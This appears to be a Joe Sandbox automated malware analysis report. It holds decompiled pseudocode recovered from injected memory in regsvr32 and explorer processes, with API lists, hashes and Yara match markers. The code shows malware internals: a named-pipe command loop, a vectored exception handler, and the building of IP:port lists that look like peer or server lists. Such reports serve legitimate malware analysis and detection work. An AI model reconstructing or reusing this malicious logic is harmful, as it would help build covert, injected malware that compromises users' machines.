                                                                                                                                                                        				}
                                                                                                                                                                        				lstrlenW( &_v20);
                                                                                                                                                                        				_t29 = _a8;
                                                                                                                                                                        				_t22 = _a12 - _t29 + 1;
                                                                                                                                                                        				_a12 = _t22;
                                                                                                                                                                        				asm("fild dword [ebp+0x10]");
                                                                                                                                                                        				if(_t22 < 0) {
                                                                                                                                                                        					_t40 = _t40 +  *0x5bacf58;
                                                                                                                                                                        				}
                                                                                                                                                                        				_a12 = _t28;
                                                                                                                                                                        				_v12 = _t40;
                                                                                                                                                                        				_t41 = _v12;
                                                                                                                                                                        				asm("fild dword [ebp+0x10]");
                                                                                                                                                                        				if(_t28 < 0) {
                                                                                                                                                                        					_t41 = _t41 +  *0x5bacf58;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v12 = _t41;
                                                                                                                                                                        				asm("fmulp st1, st0");
                                                                                                                                                                        				L05BA8935();
                                                                                                                                                                        				return _t29 - _t22;
                                                                                                                                                                        			}


















                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 05BA36BB
                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 05BA36FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ftol2_sselstrlen
                                                                                                                                                                        • String ID: msxml3.dll
                                                                                                                                                                        • API String ID: 1292649733-2158035192
                                                                                                                                                                        • Opcode ID: 90dc7053ac36ea0d034e79bef8cc99ba7f24a0ce1680454794f551dd86c9b2b2
                                                                                                                                                                        • Instruction ID: cd8900799d145c64e644e2b0f2fba75380089f97480f01df31a0404fabbc9ac6
                                                                                                                                                                        • Opcode Fuzzy Hash: 90dc7053ac36ea0d034e79bef8cc99ba7f24a0ce1680454794f551dd86c9b2b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 8911E033A08649ABCF00AF68E80A49D7FB5FF90350B2289A9E81193241EB31E5648781
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                        			E007A36AA(void* __edx, void* __eflags) {
                                                                                                                                                                        				CHAR* _v8;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				CHAR* _t41;
                                                                                                                                                                        
                                                                                                                                                                        				_t39 = __edx;
                                                                                                                                                                        				_t28 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				_t10 = E007AD11F( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                                                                                                                                                                        				_t41 = _t10;
                                                                                                                                                                        				_v8 = _t41;
                                                                                                                                                                        				if(_t41 != 0) {
                                                                                                                                                                        					_t11 = E007A8BDE(0x80000); // executed
                                                                                                                                                                        					 *0x7bf8bc = _t11;
                                                                                                                                                                        					__eflags = _t11;
                                                                                                                                                                        					if(_t11 != 0) {
                                                                                                                                                                        						_t12 = E007ACD02( &_v20);
                                                                                                                                                                        						__eflags = _t12;
                                                                                                                                                                        						if(_t12 >= 0) {
                                                                                                                                                                        							_t13 = _v20;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t13 = 0;
                                                                                                                                                                        							_v20 = 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = 0 - _t13;
                                                                                                                                                                        						asm("sbb eax, eax");
                                                                                                                                                                        						_t16 = CreateNamedPipeA(_t41, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, _t13 &  &_v20);
                                                                                                                                                                        						 *0x7bf804 = _t16;
                                                                                                                                                                        						__eflags = _t16 - 0xffffffff;
                                                                                                                                                                        						if(_t16 != 0xffffffff) {
                                                                                                                                                                        							E007ACAE1( &_v20, _t39); // executed
                                                                                                                                                                        							_t18 = E007AA205(E007A377F, 0, __eflags, 0, 0); // executed
                                                                                                                                                                        							__eflags = _t18;
                                                                                                                                                                        							if(_t18 != 0) {
                                                                                                                                                                        								goto L12;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t22 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        							 *((intOrPtr*)(_t22 + 0x30))( *0x7bf804);
                                                                                                                                                                        							_push(0xfffffffd);
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *0x7bf804 = 0;
                                                                                                                                                                        							_push(0xfffffffe);
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_pop(0);
                                                                                                                                                                        							L12:
                                                                                                                                                                        							E007A8BF4( &_v8, 0xffffffff);
                                                                                                                                                                        							return 0;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0xfffffff5);
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t10 | 0xffffffff;
                                                                                                                                                                        			}
















                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: adca72621185f3ffbb28bd4c09cd9a32fc8b0f55105c514150dbcd0f9ee39f18
                                                                                                                                                                        • Instruction ID: 73c215b6a22821d51644bba80c5f2ab2c4f13ceb410947705b2f8b53dfc404e2
                                                                                                                                                                        • Opcode Fuzzy Hash: adca72621185f3ffbb28bd4c09cd9a32fc8b0f55105c514150dbcd0f9ee39f18
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C2195B2604115ABD710AF79EC95FAA37E8EB86770B204339F526D71D1EB389A008790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A5FF2(void* __eflags) {
                                                                                                                                                                        				intOrPtr _t2;
                                                                                                                                                                        				void* _t6;
                                                                                                                                                                        				void* _t7;
                                                                                                                                                                        
                                                                                                                                                                        				_t2 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        				 *((intOrPtr*)(_t2 + 0x114))(1, E007A5F97);
                                                                                                                                                                        				E007A5C22(_t6, _t7); // executed
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}






                                                                                                                                                                        0x007a5ff2
                                                                                                                                                                        0x007a5ffe
                                                                                                                                                                        0x007a6004
                                                                                                                                                                        0x007a600b

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000001,007A5F97,007A61C1), ref: 007A5FFE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionHandlerVectored
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3310709589-0
                                                                                                                                                                        • Opcode ID: 4b1ef988f7c4cebe009f21406cd7ab322aa6226ebba9ffced480de730153d2ae
                                                                                                                                                                        • Instruction ID: cd6a2d4ae02d5b52b12b89e26e5cb113c215e8101729abd7ba6fd4357b2829bf
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b1ef988f7c4cebe009f21406cd7ab322aa6226ebba9ffced480de730153d2ae
                                                                                                                                                                        • Instruction Fuzzy Hash: D3B09270241B009FC300A760EC0BFE836909B86B02F0046B0B208C50A6DAB844404A65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 85%
E007A50B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
	void _v532;
	char _v548;
	char _v580;
	char _v584;
	signed int _v588;
	intOrPtr _v592;
	WCHAR* _v596;
	char _v600;
	intOrPtr _v604;
	char _v632;
	char _v636;
	void* __ebx;
	void* __esi;
	intOrPtr _t56;
	char _t63;
	intOrPtr _t65;
	intOrPtr _t66;
	signed int _t70;
	signed int _t72;
	void* _t76;
	void* _t77;
	signed int _t78;
	intOrPtr _t79;
	signed int _t81;
	intOrPtr _t82;
	WCHAR* _t84;
	intOrPtr _t94;
	intOrPtr _t95;
	void* _t96;
	intOrPtr _t97;
	signed char _t104;
	void* _t107;
	intOrPtr _t108;
	intOrPtr _t110;
	void* _t113;
	void* _t114;
	WCHAR* _t115;
	void* _t126;
	WCHAR* _t130;
	intOrPtr _t142;
	void* _t143;
	void* _t163;
	signed int _t166;
	void* _t167;
	void* _t169;
	void* _t173;
	signed int _t174;
	WCHAR* _t176;
	signed int _t177;
	signed int _t178;
	intOrPtr* _t180;
	signed int _t182;
	void* _t185;
	void* _t186;
	WCHAR** _t187;
	void* _t192;

	_t192 = __fp0;
	_push(_t177);
	_t113 = __edx;
	_t173 = __ecx;
	_t178 = _t177 | 0xffffffff;
	memset( &_v532, 0, 0x20c);
	_v588 = _v588 & 0x00000000;
	_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
	_v596 = 1;
	if(_t173 != 0) {
		_t108 =  *0x7bf81c; // 0x7d0000
		_t110 =  *0x7bf820; // 0xeaf8b8
		_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x110)))));
	}
	if(E007AC9F4(_t173) != 0) {
		L4:
		_t56 = E007AC6CE(); // executed
		_push(_t113);
		_v592 = _t56;
		E007AC4C1(_t56,  &_v580, _t190, _t192);
		_t114 = E007A5072( &_v580,  &_v580, _t190);
		_t126 = E007AE2C5( &_v580, E007AA43D( &_v580), 0);
		E007AC6E4(_t126,  &_v548, _t192);
		_push(_t126);
		_t161 =  &_v580;
		_t63 = E007A317E(_t173,  &_v580, _t190, _t192); // executed
		_v600 = _t63;
		if(_t63 != 0) {
			_push(0);
			_push(_t114);
			_push(0x7bc9a0);
			_t115 = E007A9A5A(_t63);
			_t186 = _t185 + 0x10;
			_t65 =  *0x7bf81c; // 0x7d0000
			__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
			if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
				L12:
				__eflags = _v596;
				if(__eflags != 0) {
					_t66 = E007A98BD(_v600);
					_t130 = _t115;
					 *0x7bf8d8 = _t66;
					 *0x7bf8d0 = E007A98BD(_t130);
					L17:
					_push(_t130);
					_t70 = E007AA633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600); // executed
					_t174 = _t70;
					_t187 = _t186 + 0x10;
					__eflags = _t174;
					if(_t174 == 0) {
						goto L41;
					}
					_push(0x7bc9f2);
					_t163 = 0xe;
					E007AAAA3(_t163, _t192); // executed
					E007AAADC(_t174, _t192, _t115); // executed
					_t180 = _a4;
					_push( *_t180);
					E007AAA7E(0xb); // executed
					_t165 =  *(_t180 + 0x10);
					__eflags =  *(_t180 + 0x10);
					if( *(_t180 + 0x10) != 0) {
						E007AB025(_t165, _t192);
					}
					_t166 =  *(_t180 + 0xc);
					__eflags = _t166;
					if(_t166 != 0) {
						E007AB025(_t166, _t192); // executed
					}
					_t76 = E007AA065(0);
					_push(_t166);
					_t167 = 2;
					_t77 = E007AAA50(); // executed
					__eflags = _v596;
					_t142 = _t76;
					if(_v596 == 0) {
						_t142 =  *0x7bf81c; // 0x7d0000
						__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
						if(__eflags != 0) {
							_t78 = E007B0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
							_t187 =  &(_t187[3]);
							goto L26;
						}
						_t142 = _t142 + 0x228;
						goto L25;
					} else {
						_t79 =  *0x7bf81c; // 0x7d0000
						__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
						if(__eflags != 0) {
							L32:
							__eflags =  *(_t79 + 0x1898) & 0x00000082;
							if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
								_t169 = 0x64;
								E007AF0DE(_t169);
							}
							E007A584B( &_v580, _t192);
							_t176 = _a8;
							_t143 = _t142;
							__eflags = _t176;
							if(_t176 != 0) {
								_t82 =  *0x7bf81c; // 0x7d0000
								__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
								if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
									lstrcpyW(_t176, _t115);
								} else {
									_t84 = E007A109A(_t143, 0x49f);
									_v596 = _t84;
									lstrcpyW(_t176, _t84);
									E007A8BAF( &_v596);
									 *_t187 = 0x7bc9b0;
									lstrcatW(_t176, ??);
									lstrcatW(_t176, _t115);
									lstrcatW(_t176, 0x7bc9b0);
								}
							}
							_t81 = _a12;
							__eflags = _t81;
							if(_t81 != 0) {
								 *_t81 = _v592;
							}
							_t178 = 0;
							__eflags = 0;
							goto L41;
						}
						_t40 = _t79 + 0x228; // 0x7d0228
						_t142 = _t40;
						L25:
						_t78 = E007A5AC0(_t142, _t115, __eflags);
                                                                                                                                                                        									L26:
                                                                                                                                                                        									__eflags = _t78;
                                                                                                                                                                        									if(_t78 >= 0) {
                                                                                                                                                                        										_t79 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        										goto L32;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push(0xfffffffd);
                                                                                                                                                                        									L6:
                                                                                                                                                                        									_pop(_t178);
                                                                                                                                                                        									goto L41;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t94 = E007AD11F(_v592, __eflags);
                                                                                                                                                                        							_v600 = _t94;
                                                                                                                                                                        							_t95 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                                                                                                                                                        							__eflags = _t96 - _t178;
                                                                                                                                                                        							if(_t96 != _t178) {
                                                                                                                                                                        								_t97 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        								 *((intOrPtr*)(_t97 + 0x30))();
                                                                                                                                                                        								E007A8BF4( &_v636, _t178);
                                                                                                                                                                        								_t130 = _t96;
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							E007A8BF4( &_v632, _t178);
                                                                                                                                                                        							_t72 = 1;
                                                                                                                                                                        							goto L42;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t104 =  *(_t65 + 0x1898);
                                                                                                                                                                        						__eflags = _t104 & 0x00000004;
                                                                                                                                                                        						if((_t104 & 0x00000004) == 0) {
                                                                                                                                                                        							__eflags = _t104;
                                                                                                                                                                        							if(_t104 != 0) {
                                                                                                                                                                        								goto L12;
                                                                                                                                                                        							}
                                                                                                                                                                        							L11:
                                                                                                                                                                        							E007AF1F6(_v600, _t161);
                                                                                                                                                                        							goto L12;
                                                                                                                                                                        						}
                                                                                                                                                                        						E007AF1B6(_v600,  &_v580);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0xfffffffe);
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t107 = E007A3097( &_v532, _t178, 0x105); // executed
                                                                                                                                                                        					_t190 = _t107;
                                                                                                                                                                        					if(_t107 == 0) {
                                                                                                                                                                        						L41:
                                                                                                                                                                        						E007A5F6F( &_v588);
                                                                                                                                                                        						_t72 = _t178;
                                                                                                                                                                        						L42:
                                                                                                                                                                        						return _t72;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        0x007a53b1
                                                                                                                                                                        0x007a53b1
                                                                                                                                                                        0x007a53b3
                                                                                                                                                                        0x007a53b3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a53b3
                                                                                                                                                                        0x007a52eb
                                                                                                                                                                        0x007a52eb
                                                                                                                                                                        0x007a52f1
                                                                                                                                                                        0x007a52f3
                                                                                                                                                                        0x007a52f8
                                                                                                                                                                        0x007a52f8
                                                                                                                                                                        0x007a52fa
                                                                                                                                                                        0x007a5329
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5329
                                                                                                                                                                        0x007a52fc
                                                                                                                                                                        0x007a518a
                                                                                                                                                                        0x007a518a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a518a
                                                                                                                                                                        0x007a52db
                                                                                                                                                                        0x007a51de
                                                                                                                                                                        0x007a51ec
                                                                                                                                                                        0x007a51ff
                                                                                                                                                                        0x007a5204
                                                                                                                                                                        0x007a520a
                                                                                                                                                                        0x007a520c
                                                                                                                                                                        0x007a5224
                                                                                                                                                                        0x007a5229
                                                                                                                                                                        0x007a5232
                                                                                                                                                                        0x007a5238
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5238
                                                                                                                                                                        0x007a5214
                                                                                                                                                                        0x007a521d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a521d
                                                                                                                                                                        0x007a51b1
                                                                                                                                                                        0x007a51b7
                                                                                                                                                                        0x007a51b9
                                                                                                                                                                        0x007a51c6
                                                                                                                                                                        0x007a51c8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a51ca
                                                                                                                                                                        0x007a51ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a51ce
                                                                                                                                                                        0x007a51bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a51bf
                                                                                                                                                                        0x007a5188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5113
                                                                                                                                                                        0x007a511e
                                                                                                                                                                        0x007a5124
                                                                                                                                                                        0x007a5126
                                                                                                                                                                        0x007a53b5
                                                                                                                                                                        0x007a53b9
                                                                                                                                                                        0x007a53be
                                                                                                                                                                        0x007a53c0
                                                                                                                                                                        0x007a53c6
                                                                                                                                                                        0x007a53c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5126

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1985475764-0
                                                                                                                                                                        • Opcode ID: adc93e6a0609498401a5b07bf38559d9116ce493041a0aa1f478adfd07696d54
                                                                                                                                                                        • Instruction ID: cda5df497af8a126bbe589976945a470aa2e576995381f15b66eb5876f9a15f8
                                                                                                                                                                        • Opcode Fuzzy Hash: adc93e6a0609498401a5b07bf38559d9116ce493041a0aa1f478adfd07696d54
                                                                                                                                                                        • Instruction Fuzzy Hash: DB81ED71604700ABD714EB20EC8AF7E73E9ABC6710F14872DF5558B2D1EBBC99048B82
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                        			E007A377F(void* __fp0) {
                                                                                                                                                                        				struct _OVERLAPPED* _v144;
                                                                                                                                                                        				char _v152;
                                                                                                                                                                        				char _v156;
                                                                                                                                                                        				char _v160;
                                                                                                                                                                        				intOrPtr _v164;
                                                                                                                                                                        				char _v168;
                                                                                                                                                                        				struct _OVERLAPPED* _v172;
                                                                                                                                                                        				signed int _v176;
                                                                                                                                                                        				signed int _v180;
                                                                                                                                                                        				struct _OVERLAPPED* _v184;
                                                                                                                                                                        				signed int _v188;
                                                                                                                                                                        				char _v192;
                                                                                                                                                                        				struct _OVERLAPPED* _v196;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				unsigned int* _t104;
                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                        				void* _t118;
                                                                                                                                                                        				intOrPtr _t124;
                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                        				intOrPtr _t129;
                                                                                                                                                                        				intOrPtr _t132;
                                                                                                                                                                        				void* _t133;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                        				signed short* _t149;
                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				signed short* _t192;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				signed int _t199;
                                                                                                                                                                        				signed int _t200;
                                                                                                                                                                        				signed int _t203;
                                                                                                                                                                        				signed int _t204;
                                                                                                                                                                        				char _t205;
                                                                                                                                                                        				signed int _t206;
                                                                                                                                                                        				void* _t208;
                                                                                                                                                                        				void* _t214;
                                                                                                                                                                        				void* _t221;
                                                                                                                                                                        
				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_v152 = 0;
					if(ConnectNamedPipe( *0x7bf804, 0) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v152);
					_t75 =  *0x7bf818; // 0xeaf6c8
					_push(0x80000);
					_push( *0x7bf8bc);
					_push( *0x7bf804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v172 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x7bf8bc; // 0x4fd4020
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E007B0962( &_v192);
								L12:
								_t84 =  &_v192;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E007AD1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x7bf804);
								_push(0);
								_pop(0);
								if(_v164 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v196 = 0;
								_t88 = E007A171A( &_v196, _t221);
								_v180 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v184 = 0;
									_push( &_v184);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v196;
								_v176 = _t146 * 0x16;
								_t203 = E007A8BDE(_t146 * 0x16);
								_v184 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v184;
									 *_t64 = _v184 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v184);
									_t188 = 0xa;
									E007AD1A6(_t188);
									L52:
									E007A8BF4( &_v180, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E007AA43D(_t203));
									_push(_t203);
									_t189 = 5;
									E007AD1A6(_t189);
									E007A8BF4( &_v184, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v180 + 4;
								__eflags = _t159;
								_v196 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E007AA43D(_t203);
											_t159 = _v196;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v188 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E007AA43D(_t203);
										_t104 = _v196;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										__eflags = E007AA43D(_t203) + _t203;
										E007A9E12(E007AA43D(_t203) + _t203, _v176 - _t103, "%u.%u.%u.%u:%u", _v188 & 0x000000ff);
										_t159 = _v196;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v196 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v196 = 0;
							_t113 = E007A171A( &_v196, _t221);
							_t204 = _v196;
							_v188 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E007A8BF4( &_v188, _t204);
							}
							_v196 = _t204 * 0x16;
							_t84 =  &_v196;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E007B0962( &_v192);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v192);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E007A9B33( &(_t149[4]), 0x20, 1,  &_v168);
							_v188 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x7bf8bc; // 0x4fd4020
								E007A9EDB( &_v156,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v160);
								_push(2);
								goto L31;
							}
							_t205 = _v168;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E007A1DD3(E007A9F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v160 = _t124;
								goto L30;
							}
							_v176 = _t205 - 1;
							_t127 = E007A8BDE(_t205 - 1 << 2);
							_v180 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E007A1DD3(E007A9F6F( *_t200, __eflags), _t127, _v176, 0);
                                                                                                                                                                        								_t208 = _t208 + 0x10;
                                                                                                                                                                        								_v160 = _t129;
                                                                                                                                                                        								E007A9C2C( &_v168);
                                                                                                                                                                        								goto L30;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v196 = _t127;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t132 = E007A9880( *((intOrPtr*)(_t200 + _t148 * 4)), E007AA43D( *((intOrPtr*)(_t200 + _t148 * 4))));
                                                                                                                                                                        								_t183 = _v196;
                                                                                                                                                                        								_t148 = _t148 + 1;
                                                                                                                                                                        								 *_t183 = _t132;
                                                                                                                                                                        								_v196 = _t183 + 4;
                                                                                                                                                                        								__eflags = _t148 - _t205;
                                                                                                                                                                        							} while (__eflags < 0);
                                                                                                                                                                        							_t127 = _v180;
                                                                                                                                                                        							goto L28;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t133 = _t118 - 3;
                                                                                                                                                                        						if(_t133 == 0) {
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_t196 = 5;
                                                                                                                                                                        							E007A5EC3(E007AD1A6(_t196));
                                                                                                                                                                        							_v164 = 1;
                                                                                                                                                                        							goto L56;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t137 = _t133;
                                                                                                                                                                        						if(_t137 == 0) {
                                                                                                                                                                        							_t84 = E007B0940( &_v192);
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t137 != 1) {
                                                                                                                                                                        							goto L56;
                                                                                                                                                                        						}
                                                                                                                                                                        						E007B0940( &_v192);
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}
                                                                                                                                                                        0x007a39b3
                                                                                                                                                                        0x007a39b7
                                                                                                                                                                        0x007a39bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a39bb
                                                                                                                                                                        0x007a380a
                                                                                                                                                                        0x007a396c
                                                                                                                                                                        0x007a384c
                                                                                                                                                                        0x007a384d
                                                                                                                                                                        0x007a384f
                                                                                                                                                                        0x007a3857
                                                                                                                                                                        0x007a3858
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3858
                                                                                                                                                                        0x007a3851
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3851
                                                                                                                                                                        0x007a3810
                                                                                                                                                                        0x007a3813
                                                                                                                                                                        0x007a388f
                                                                                                                                                                        0x007a3891
                                                                                                                                                                        0x007a3897
                                                                                                                                                                        0x007a3899
                                                                                                                                                                        0x007a3936
                                                                                                                                                                        0x007a3936
                                                                                                                                                                        0x007a3948
                                                                                                                                                                        0x007a394e
